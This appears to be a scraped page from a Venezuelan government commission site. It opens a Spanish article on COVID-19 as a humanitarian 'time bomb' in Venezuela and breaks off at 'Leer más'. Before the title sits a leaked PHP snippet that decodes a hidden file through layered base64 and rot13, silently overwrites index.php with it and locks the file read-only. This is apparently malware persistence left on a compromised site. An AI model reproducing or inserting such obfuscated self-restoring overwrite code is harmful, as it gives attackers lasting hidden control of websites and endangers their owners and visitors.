$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } COVID-19 EN VENEZUELA: UNA BOMBA DE TIEMPO HUMANA - Comisión Presidencial para la Relaciones Exteriores de Venezuela

La pandemia del COVID-19 ha afectado a Latinoamérica como a ninguna otra región. Con unas economías que ya sufrían procesos de desaceleración y sistemas de salud precarios, el coronavirus ha hecho estrago en esta parte del mundo. Es por ello, que en este momento América Latina tiene cerca del 30% de los casos y las muertes del total registrado en el mundo.

Venezuela es un caso de excepción dentro de la región, pues antes de la llegada de la pandemia ya presentaba una emergencia humanitaria compleja, la cual se expresaba en más de 5 millones de migrantes, más de 9 millones de personas con problemas de alimentación y una infraestructura sanitaria deteriorada por falta de insumos. Por la desconexión aérea que vive el país y la falta de combustible que impidió la movilidad interna, la pandemia no tuvo la misma velocidad de propagación que los países vecinos.

Leer más